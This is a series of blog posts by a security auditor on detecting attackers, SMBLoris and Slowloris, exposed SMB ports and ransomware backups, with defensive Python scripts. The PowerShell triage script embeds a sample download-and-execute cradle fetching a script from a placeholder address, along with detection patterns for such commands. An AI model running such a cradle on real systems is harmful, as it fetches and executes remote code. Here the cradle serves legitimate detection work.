How Can You Tell If Hackers Are Hacking You?

Obviously, if ransomware has already encrypted your files, it is too late to find out that you have been hacked:

I would like to discuss how we can find out whether hackers are altering your files or looking around in your network. There are several ways to explain what is happening when a criminal hacker is trying to attack your machines. Usually it starts with reconnaissance of your computers, your online profile and your other systems.


The cybersecurity industry has created something called the Cyber Kill Chain, which explains this phenomenon (how a criminal hacker attacks you). CSOonline explains it a little… But the Cyber Kill Chain was created by Lockheed Martin, a defense contractor, so it uses defense terminology, starting with the APT itself:

APT = Advanced (targeted), Persistent (month after month), Threat (a person with intent, opportunity and capability)


The cybersecurity industry is obsessed with the Cyber Kill Chain. Why? Because it is a good way of detailing the steps an attacker takes to find a way into your network.

If you think about it, there must be a way for us to explain how an attacker attacks, so that we know where to look for the attack.

I tried to use less technical terms in my SVAPE & C diagram, which I built from Mandiant's analysis of the Chinese hackers' attacks.

Scan, Vulnerability Analysis, Penetrate, Exploit and Control, i.e. SVAPE & C

The portion of the criminal attack we want to dissect is Penetrate and Exploit. In other words, recon has already been done and the vulnerabilities have been analyzed and reviewed; in Cyber Kill Chain terms we are somewhere between delivery, exploitation and installation.

Now the attacker is actually trying to take over the machine by exploiting the system somehow.

What is it that we are looking for? If a system is being altered by a human being, the event logs will record it: logons, new processes, new services and scheduled tasks, changed files. So keeping an eye on event logs is a good idea, and so is alerting when the logs themselves are cleared (on Windows that is Security event 1102, "The audit log was cleared"), because an attacker who tidies up after himself leaves that trace too.

But if the attack is by an automated program (a bot, virus or other malware), the event logs only record what its actions happen to trigger. What the bot cannot avoid is sending information back to its operator at some point (credit card numbers, health information, whatever data you keep on your computer), so outbound network traffic is the other place to look.

How do these criminal hackers attack your computers?

It turns out they use the same techniques as the presenters at DEF CON 25 (the latest convention, held in Las Vegas in July 2017). You can browse the DEF CON media server to see the presentations.

I like Leveraging PowerShell Basics by Carlos Perez.

The theme of this presentation is running little-known commands with PowerShell, and those are exactly the commands you have to be looking for when trying to find hackers in your network.

PowerShell can do many things for an attacker, and to find out which commands were run you must have advanced auditing enabled (process creation auditing with command-line logging, plus PowerShell module and script block logging); some command-line jiu-jitsu is also required to sift through the results. The HackerHurricane blog discusses the commands and settings for Windows 7 and Windows Server 2008 and later.

So the key is to find out what the hackers do and then try to detect those types of actions. But then there is another issue: making sure there are people to maintain the scripts that detect the criminal hackers and to act on what they find.

Target had the detection methods but failed on personnel to act on the detection, because somebody has to find the real problem among the many false positives.
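As an added example (not code from the original post or from the talks it cites), here is the kind of triage you would run over the PowerShell and process-creation events once the auditing above is switched on. The records are constructed; the text field stands in for the CommandLine of a process-creation event (Event ID 4688, which carries the command line only when command-line auditing is enabled) or the ScriptBlockText of a PowerShell script block logging event (Event ID 4104). Each indicator scores one point and only records scoring two or more become alerts, which is the simple trick that keeps the false positives (the Target problem) from drowning the real hits. The indicator list and the threshold are assumptions to tune locally.

```python
"""Triage Windows event records for attacker-style PowerShell usage.

Added example; the sample records are constructed, the indicators and the
alert threshold are assumptions to tune for your own environment.
"""
import base64
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    event_id: int   # 4688 = process creation, 4104 = PowerShell script block
    host: str
    text: str       # CommandLine (4688) or ScriptBlockText (4104)


# Each indicator is worth one point. A single hit is common in admin scripts
# (e.g. "-ExecutionPolicy Bypass" in a scheduled task); several together are not.
INDICATORS = {
    "download cradle": re.compile(
        r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I),
    "in-memory execution": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "stealth switches": re.compile(
        r"-nop\b|-noni\b|-w(?:indowstyle)?\s+hidden|-ep\s+bypass|-executionpolicy\s+bypass", re.I),
    "base64 in script": re.compile(r"FromBase64String", re.I),
    "reflective load": re.compile(r"\[Reflection\.Assembly\]|System\.Reflection\.Assembly", re.I),
}
# -e, -ec, -en, -enc ... -EncodedCommand followed by a base64 blob (PowerShell accepts any prefix).
ENCODED = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(text):
    """Return the decoded -EncodedCommand payload (UTF-16LE inside base64), or None."""
    m = ENCODED.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event):
    """Score one record: which indicators fire on the visible text and on any decoded payload."""
    decoded = decode_encoded_command(event.text)
    visible = ENCODED.sub(" ", event.text)   # do not pattern-match inside the base64 blob itself
    hits = set()
    if decoded is not None:
        hits.add("encoded command")
    for name, pattern in INDICATORS.items():
        if pattern.search(visible) or (decoded and pattern.search(decoded)):
            hits.add(name)
    return {"host": event.host, "event_id": event.event_id,
            "decoded": decoded, "indicators": sorted(hits), "score": len(hits)}


def triage(events, threshold=2):
    """Records scoring at or above the threshold, worst first; the rest is noise to review later."""
    scored = [analyze(e) for e in events]
    return sorted((s for s in scored if s["score"] >= threshold), key=lambda s: -s["score"])


# Constructed sample records; the attacker one-liner is encoded the way powershell -enc expects.
SAMPLE_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')"
SAMPLE_BLOB = base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    Event(4688, "WS01", f"powershell.exe -nop -w hidden -enc {SAMPLE_BLOB}"),
    Event(4104, "WS01", "Get-ChildItem C:\\Users -Recurse | Where-Object Length -gt 100MB"),
    Event(4104, "SRV02", "$b=[System.Convert]::FromBase64String($s);[Reflection.Assembly]::Load($b)"),
    Event(4688, "SRV02", "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"),
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert["host"], alert["event_id"], alert["score"], ", ".join(alert["indicators"]))
```

Run as is, the first record (hidden window, no profile, encoded download-and-execute cradle) scores 4 and the reflective loader scores 2, while the plain directory listing and the scheduled backup script with `-ExecutionPolicy Bypass` fall below the threshold. Feed it real exports and the threshold is the knob that trades missed detections for analyst time.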

Most important, there must be a will to defend and to act.

Contact Us to review your plans, we can audit your defensive plans.


Doing the Basics Would Have Saved You

A new attack with no patch available (a zero-day in that sense) is out there for attackers. It was discussed on the SANS Internet Storm Center website:

SMBLoris – the new SMB flaw

The ISC article was written after reviewing a Threatpost article, and both were ultimately triggered by a DEF CON 25 (2017) presentation:


Notice the arrows on the right of the presentation's screenshot, with memory usage on the attacked server heading toward 100%.

What makes this attack (a DoS, denial of service) so bad is how it works. SMBLoris is named after Slowloris, the HTTP attack that sends partial HTTP requests to a web server and never completes them. Enough of these partial connections slow the web server to a crawl, and since each one looks like the start of a normal request, it is hard to distinguish friend from foe. SMBLoris applies the same idea to the SMB service on port 445: every new connection makes the Windows server allocate memory up front, so a flood of half-finished connections exhausts its memory, which is what the screenshot above shows.

This is an interesting point from the Slowloris webpage:

“Slowloris holds connections open by sending partial HTTP requests. It continues to send subsequent headers at regular intervals to keep the sockets from closing. In this way webservers can be quickly tied up. In particular, servers that have threading will tend to be vulnerable, by virtue of the fact that they attempt to limit the amount of threading they’ll allow. Slowloris must wait for all the sockets to become available before it’s successful at consuming them, so if it’s a high traffic website, it may take a while for the site to free up its sockets. So while you may be unable to see the website from your vantage point, others may still be able to see it until all sockets are freed by them and consumed by Slowloris. This is because other users of the system must finish their requests before the sockets become available for Slowloris to consume. If others re-initiate their connections in that brief time-period they’ll still be able to see the site. So it’s a bit of a race condition, but one that Slowloris will eventually always win – and sooner than later.”

So this is not a simple, easy-to-see issue. The Slowloris page notes that it abuses the way the web server handles threads for the following 4 applications:


  • Apache 1.x
  • Apache 2.x
  • dhttpd
  • GoAhead WebServer

Slowloris is just one variant, and as hackers review this attack family (SMBLoris being the latest member) more variants may be created that exploit the idea in as yet unknown ways. As of this posting there is no CERT classification yet.
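To make the quoted mechanism concrete, here is an added example (not from the original post or from the Slowloris page) of the checks a server operator can run over a snapshot of the connection table: which sockets are still reading request headers long after a real browser would have finished (the Slowloris signature), which sources hold too many sockets, and how much of the worker pool is tied up. The snapshot is constructed; the thresholds are assumptions to tune against your own traffic, with HEADER_DEADLINE_S taken from the 20 to 40 second header window Apache's mod_reqtimeout ships with.

```python
"""Spot Slowloris-style sockets in a web server's connection table.

Added example. The snapshot is constructed; in practice the fields come from
the server's status page (Apache mod_status shows workers stuck in "R",
reading request) or from instrumentation in the accept loop.
"""
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class Conn:
    conn_id: int
    client_ip: str
    age_s: float        # seconds since the socket was accepted
    bytes_in: int       # request bytes received so far
    headers_done: bool  # has the blank line that ends the request headers arrived?


# Assumed policy knobs.
HEADER_DEADLINE_S = 20.0    # mod_reqtimeout default is header=20-40 seconds
MIN_HEADER_RATE_BPS = 40.0  # browsers send a few hundred header bytes in well under a second
PER_IP_LIMIT = 10           # concurrent sockets one source may hold
GRACE_S = 5.0               # do not judge a socket younger than this (slow mobile links)


def slow_readers(conns):
    """Sockets still reading headers that are past the deadline or trickling bytes: drop these."""
    drop = []
    for c in conns:
        if c.headers_done or c.age_s < GRACE_S:
            continue
        too_old = c.age_s >= HEADER_DEADLINE_S
        trickle = c.bytes_in / c.age_s < MIN_HEADER_RATE_BPS
        if too_old or trickle:
            drop.append(c.conn_id)
    return drop


def over_limit_sources(conns):
    """Sources holding more sockets than PER_IP_LIMIT: rate-limit or block at the firewall.
    This only helps against a single-host Slowloris; a botnet stays below the limit per source."""
    counts = Counter(c.client_ip for c in conns)
    return sorted(ip for ip, n in counts.items() if n > PER_IP_LIMIT)


def worker_pressure(conns, max_workers):
    """Share of the worker pool held by sockets that have not finished their headers.
    A busy but healthy site stays near 0; Slowloris drives it towards 1."""
    return sum(1 for c in conns if not c.headers_done) / max_workers


def assess(conns, max_workers):
    return {"drop": slow_readers(conns), "block": over_limit_sources(conns),
            "pressure": worker_pressure(conns, max_workers)}


# Constructed snapshot: one source trickling header bytes on 12 sockets,
# two normal requests already parsed, one slow but young legitimate client.
SNAPSHOT = (
    [Conn(i, "198.51.100.7", 10.0 + 5 * i, 9 + i, False) for i in range(12)]
    + [Conn(100, "203.0.113.20", 1.2, 612, True), Conn(101, "203.0.113.21", 0.4, 588, True)]
    + [Conn(102, "203.0.113.22", 3.0, 120, False)]
)
MAX_WORKERS = 16

if __name__ == "__main__":
    result = assess(SNAPSHOT, MAX_WORKERS)
    print(f"drop {len(result['drop'])} sockets, block {result['block']}, "
          f"{result['pressure']:.0%} of workers stuck reading headers")
```

The two signals work together: the per-socket deadline frees a worker no matter who holds it, and the per-source cap stops one machine from refilling the pool, which is exactly the race the quoted paragraph describes. The young client on socket 102 is deliberately left alone so that a slow but genuine user is not cut off before the grace period.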

What do I mean by the basics? Well, if you have a web server it should not have port 445 open to the public:

Port 445 definition:

Port 445 is the SMB (Server Message Block) port, used by Windows file and printer sharing; it carries SMB directly over TCP, while the older NetBIOS session service on port 139 carries the same protocol. One should not have a web server with port 445 open and available on the Internet.

So, if you have done the basics, i.e. not exposed 445 or other ports that are unnecessary, then this attack will likely not affect you, or at least only minimally. If you really had to keep everything open, it might be time to run a firewall in front of your website that only passes the ports the public needs. This is a fluid issue at this time, so keep an eye out for new attacks. Contact Us to discuss.
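Here is an added example (not code from the original post) of the basics check itself: parse the listening sockets from netstat output and report everything reachable from the network that a web server does not need. The netstat text is constructed to look like `netstat -an` on a Windows web server with SMB, RPC and RDP also listening; the role allowlist and the port notes are assumptions to adapt to your own servers. The parser also accepts the Linux `ss -lnt` layout.

```python
"""Audit a host's listening ports against what its role actually needs.

Added example; the netstat text is constructed and the role policy and
port notes are assumptions.
"""

# Services that should not face the Internet on a web server (assumed notes).
PORT_NOTES = {
    22: "SSH",
    135: "MS-RPC endpoint mapper",
    139: "NetBIOS session service (SMB over NetBIOS)",
    445: "SMB (Server Message Block) file and printer sharing over TCP",
    1433: "Microsoft SQL Server",
    3306: "MySQL",
    3389: "Remote Desktop",
    5985: "WinRM over HTTP",
    5986: "WinRM over HTTPS",
}
ROLE_ALLOW = {"webserver": {80, 443}}   # assumed role policy
LOOPBACK_PREFIXES = ("127.", "[::1]")
ANY_ADDRESS = {"0.0.0.0", "*", "[::]", "::"}


def parse_listeners(text):
    """Yield (local_address, port) for each listening TCP socket.
    Windows netstat: 'TCP <local> <foreign> LISTENING'; Linux ss: 'LISTEN rq sq <local> <peer>'."""
    for line in text.splitlines():
        fields = line.split()
        if not any(f.upper().startswith("LISTEN") for f in fields):
            continue
        local = fields[1] if fields[0].upper() == "TCP" else fields[3]
        addr, _, port = local.rpartition(":")   # rpartition keeps [::]:445 intact
        yield addr, int(port)


def scope_of(addr):
    if addr.startswith(LOOPBACK_PREFIXES):
        return "loopback"
    return "all interfaces" if addr in ANY_ADDRESS else f"interface {addr}"


def audit(text, role):
    """Listeners reachable from the network that the role does not need, lowest port first."""
    allowed = ROLE_ALLOW[role]
    findings = {}
    for addr, port in parse_listeners(text):
        scope = scope_of(addr)
        if scope == "loopback" or port in allowed:
            continue
        findings[(port, scope)] = {
            "port": port, "scope": scope,
            "note": PORT_NOTES.get(port, "unrecognised service; identify the owning process"),
        }
    return [findings[k] for k in sorted(findings)]


# Constructed `netstat -an` excerpt from a Windows web server.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:443            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1433         0.0.0.0:0              LISTENING
  TCP    192.0.2.10:80          203.0.113.5:51022      ESTABLISHED
  TCP    [::]:443               [::]:0                 LISTENING
  TCP    [::]:445               [::]:0                 LISTENING
  UDP    0.0.0.0:123            *:*
"""

if __name__ == "__main__":
    for f in audit(SAMPLE_NETSTAT, "webserver"):
        print(f"port {f['port']:>5} on {f['scope']}: {f['note']}")
```

On the sample it reports 135, 445 and 3389 listening on all interfaces and says nothing about SQL Server, because that one is bound to loopback only. Run it on the server itself (what is listening) and then from the Internet side (what is reachable); the difference between the two lists is what your firewall is actually doing for you.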


Remember, the hacker takes advantage of poor configurations.

Contact Us to discuss auditing your environment and review the basics in IT security.




What Worked In the Past May Not Work Soon

We are always enthralled with technology and how it changes the status quo, but we also need to be aware that tactics built on a technology may need updating when the technology changes.

In 2017 we are obsessing over online sales and how the smart phone is changing our world. Now there are grumblings about self-driving cars, and about quantum computers, which would upend our encryption technologies and how we defend our networks.

Do you remember this headline?

“SSL security is no longer PCI compliant”

Encryption technologies become obsolete once wily people develop a method to circumvent them. In this case SSL 3.0 was broken by attacks such as POODLE, and the PCI council responded by removing SSL (and early TLS) from the list of acceptable protocols in PCI DSS 3.1.

Yes, when quantum computing starts to crack our current ‘unbreakable’ encryption it will make us change how we secure data, but until then are we just worrying about nothing?

What about more effective Windows kernel exploitation? Like in this Black Hat 2017 presentation:

The paper shows that even with all of the mitigations Microsoft built into Windows 10, it is still possible to turn a kernel memory-corruption bug into working kernel-mode read and write primitives and take over the machine. I.e. even the new Microsoft operating system is vulnerable to attacks.

I bring this topic up because we are not sure what the future will bring, and thus we do not know which part of our current life to change so as to ‘fix’ future problems.

Here is a very old “change decision”. I am sure you know by now that the Dutch held the land of what is currently called Manhattan (NY) and called it New Amsterdam (map from the year 1660 below).

Only 4 years after this map was drawn the city was called New York, as the Dutch governor surrendered to an English expedition in 1664. The whole history is on this website:

I am sure the Dutch who went on the first expedition and created the colony in 1626 did not think that in less than 40 years it would be English. Circumstances were such that the Dutch lost possession, or thought it was in their interest to trade away what they had painstakingly created.

Things change quickly: all those plans for many years, and in a heartbeat everything changed. Now over 300 years later we do not even remember the Dutch in America (except for historians and quirky IT people).

So let’s take it back to 2017… We need to plan contingencies for many different situations before they happen; otherwise events will overcome our actions, our actions become reactionary, and we are just trying to keep our heads above water (or what we think is above water). What am I talking about specifically?

  1. Ransomware attacks
  2. Social media and email phishing employees of companies

Let’s keep it simple and try to devise strategies to defend against both 1 (ransomware) and 2 (phishing).

What can prevent a ransomware attack if attackers are constantly improving themselves and errors sometimes occur in your network? Maybe ‘prevent’ is the wrong word; ‘keep you in business’ are better words. A well-designed and tested backup strategy will let you survive an attack even if it takes your computers out, or if a disaster occurs.

If you are the person in charge of your business, how can you reasonably be sure that your business will still be alive next year, no matter what happens?

Your business must have security procedures, and they have to include backup and recovery strategies.

Make sure that your IT department has the wherewithal to handle this new world by auditing it and receiving reports on how it will handle future occurrences. Don’t be the standard business with no cybersecurity budget or no backups of your files.

Since I am CISA certified I can audit your network and computers to give you some peace of mind. Contact me to discuss.


Cybersecurity: Challenging Onerous Tough


Overview of cybersecurity challenges:

David Kennedy appears in the first 25 minutes of the YouTube video above, and he gives a good overview of where we are in cybersecurity: a single employee can take down your company. It is not just the technical details; it also includes people learning best practices to defend against the hacking activities of the bad guys (black hat hackers). David also ‘hacks’ a person who came up from the audience and finds her social security number in a few minutes.


The Harvard Business Review also has an article on “Why is Cybersecurity so Hard?”

The paragraph “The Differing Rules in Cyberspace” explains why this is such a difficult subject:

Physical-world models do not work in cyberspace; you can’t assign a local police department to a network that connects the whole world.

What about responsibility between government and private sector? Who is responsible for a virus infection that infected your own company and then another company (because it mailed itself to your address list)?

When the NSA keeps specific bugs and exploits to itself so that it can track and watch enemies of the state, that may be good for national goals, but it becomes bad when the enemy steals these exploits…

WannaCry spread using EternalBlue, an exploit developed by the NSA.

Who is responsible for this software flaw in the first place? Is it Microsoft, which should have known better?

The problem with cybersecurity is that security flaws are sometimes not found until long after the software has shipped.

The flaw is found and then the vulnerability is introduced to the world; the exploit is released, somehow it always is. The WannaCry vulnerability was found by the NSA first, and the exploit was then leaked by a group calling itself the Shadow Brokers before being used in the outbreak. But the vulnerability was there nonetheless for anyone with the computing talent to find.

This is actually the crux of the cybersecurity issue: there are people with unique hacking talents who can take advantage of our computing infrastructure. Somehow there are flaws in various parts of the operating systems and other pieces of the information technology puzzle, and these computer whizkids (we call them hackers) find these flaws and create exploits so that they can make some money. The criminal underground has built a method of monetizing this phenomenon with ransomware.

Here is another interesting issue that just arose:

gSOAP flaw leaves thousands of IoT devices vulnerable to remote code execution.

gSOAP is used in many applications and products, including IoT devices (apparently as many as 34 different kinds). Although this is a unique vulnerability that requires some doing to exploit, the likely use of an exploit would be to commandeer devices without permission, as in the Mirai event that Brian Krebs has written about.

The Mirai event was a DDoS attack that used IoT devices taken over online to attack various pieces of infrastructure. In this case the criminal element sells time on these illegally obtained devices to attack systems.

So this is another reason the problem is difficult: the complexity of software, and understanding what happens inside it, is not trivial. The very nature of this problem then causes confusion, or apathy. The problem only rears its ugly head when it is your software being attacked or being used.

The only way to combat this is to elevate your game and to perform audits of your IT infrastructure and software. The audits must be done to further understanding and reach the end result, which is to deny the criminals.

Contact us to review and audit your environment.

We are CISA (Certified Information Systems Auditor) certified.


Disaster Recovery – Backups – also a Cybersecurity must

Why discuss backups and disaster recovery as a cybersecurity topic?

Because what is the worst thing that can happen to your computer data?

Oh yes: ransomware will encrypt your data, and without a backup the only way to decrypt it is to pay the criminals. Of course there is no guarantee that after you pay them the decryption will happen without any flaws.

So what is your only solution? If you ask me, the criminals with their ransomware are forcing us to use proper IT processes. Restore from the backup you have, following the written backup and recovery process, so that you are not improvising something new but recovering from a standard IT problem: data has been lost and a backup is required.

So really we should have a backup and recovery process and procedure no matter what, and especially now that more and more ransomware is making the pain of failure so much higher.

And ransomware is not going away; criminals are making more of it, more sophisticated and affecting more PCs. After Petya came NotPetya (June 2017), which posed as ransomware but effectively destroyed data: even victims who paid could not recover their files, so a backup was the only way back.

The bottom line is: you had better create a disaster recovery process with backups and more, for a real disaster and not just a ransomware disaster.
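As an added example (not from this post or the earlier one on backup strategies), here is what “use your backup with a written process” looks like in code: a SHA-256 manifest taken when the backup is made, a verification of a restored copy against it (the restore test most plans skip), and a gate that refuses to rotate backups when the source tree suddenly consists of high-entropy files, which is what a ransomware run leaves behind and exactly what you do not want overwriting your last good copy. The sample files, paths and thresholds are constructed for the demo.

```python
"""Backup integrity and pre-rotation sanity checks.

Added example; sample files, paths and thresholds are constructed.
"""
import hashlib
import math
import random
import shutil
import tempfile
from collections import Counter
from pathlib import Path


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Relative path -> SHA-256 for every file under root. Store this with the backup."""
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def verify_restore(manifest, restored):
    """Compare a restored tree with the manifest taken when the backup was made."""
    report = {"ok": 0, "missing": [], "corrupted": []}
    for rel, digest in manifest.items():
        p = restored / rel
        if not p.is_file():
            report["missing"].append(rel)
        elif sha256_file(p) != digest:
            report["corrupted"].append(rel)
        else:
            report["ok"] += 1
    return report


def shannon_entropy(data):
    """Bits per byte: documents sit well below 7, encrypted or compressed data near 8."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0


def ransomware_gate(previous, root, entropy_threshold=7.5, max_changed_fraction=0.5):
    """Refuse to rotate backups when most tracked files changed or vanished since the last
    manifest and the new content looks encrypted; rotating would overwrite the last good copy."""
    current = build_manifest(root)
    unchanged = {rel for rel, d in current.items() if previous.get(rel) == d}
    touched = [rel for rel in previous if rel not in unchanged]      # changed or gone
    fresh = [rel for rel in current if rel not in unchanged]         # new or rewritten
    encrypted_looking = [rel for rel in fresh
                         if shannon_entropy((root / rel).read_bytes()) >= entropy_threshold]
    fraction = len(touched) / len(previous) if previous else 0.0
    suspicious = fraction > max_changed_fraction and len(encrypted_looking) >= len(touched) / 2
    return {"changed_fraction": fraction, "encrypted_looking": len(encrypted_looking),
            "safe_to_rotate": not suspicious}


def demo():
    """Constructed walk-through: good restore, tampered restore, healthy rotation, infected one."""
    work = Path(tempfile.mkdtemp())
    src, restored = work / "data", work / "restore"
    (src / "reports").mkdir(parents=True)
    (src / "notes.txt").write_text("quarterly notes\n" * 200)
    (src / "reports" / "q1.csv").write_text("date,amount\n" + "2017-07-01,100.00\n" * 300)
    (src / "reports" / "q2.csv").write_text("date,amount\n" + "2017-08-01,250.00\n" * 300)
    manifest = build_manifest(src)

    shutil.copytree(src, restored)                    # the backup job, then a test restore
    clean = verify_restore(manifest, restored)
    (restored / "notes.txt").write_text("quarterly notes\n" * 199 + "tampered\n")
    tampered = verify_restore(manifest, restored)     # bit rot or tampering in the copy

    (src / "notes.txt").write_text("quarterly notes\n" * 201)
    healthy = ransomware_gate(manifest, src)          # one edited file: rotation allowed

    rng = random.Random(1)                            # deterministic stand-in for ciphertext
    for p in (src / "notes.txt", src / "reports" / "q1.csv", src / "reports" / "q2.csv"):
        (p.parent / (p.name + ".locked")).write_bytes(bytes(rng.getrandbits(8) for _ in range(8192)))
        p.unlink()
    infected = ransomware_gate(manifest, src)         # everything rewritten as noise: refuse

    shutil.rmtree(work)
    return {"clean": clean, "tampered": tampered, "healthy": healthy, "infected": infected}


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

The manifest is cheap insurance: without it a restore that “succeeds” can still hand back silently corrupted files. The gate is the piece most backup jobs lack; a scheduled backup that runs faithfully after the encryption has started will cheerfully replace your good copies with ciphertext, which is why keeping several generations (and at least one offline) matters as much as the backup itself.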

In my eyes the ransomware stories out there are creating more need for the disaster recovery procedures you should have anyway.

What exactly are you waiting for? Why take the chance every day that you will click on something that links you to one of the ransomware outbreaks in the world?

Imagine a revolver with a huge cylinder (100 or 500 chambers, depending on your risk and impact level) and one loaded round. Every day you spin the cylinder and pull the trigger; if something happens that is out of your control, the RiskGun fires and you get ransomware.

Contact me to discuss how I can review your processes and procedures to ensure your business will weather any storm.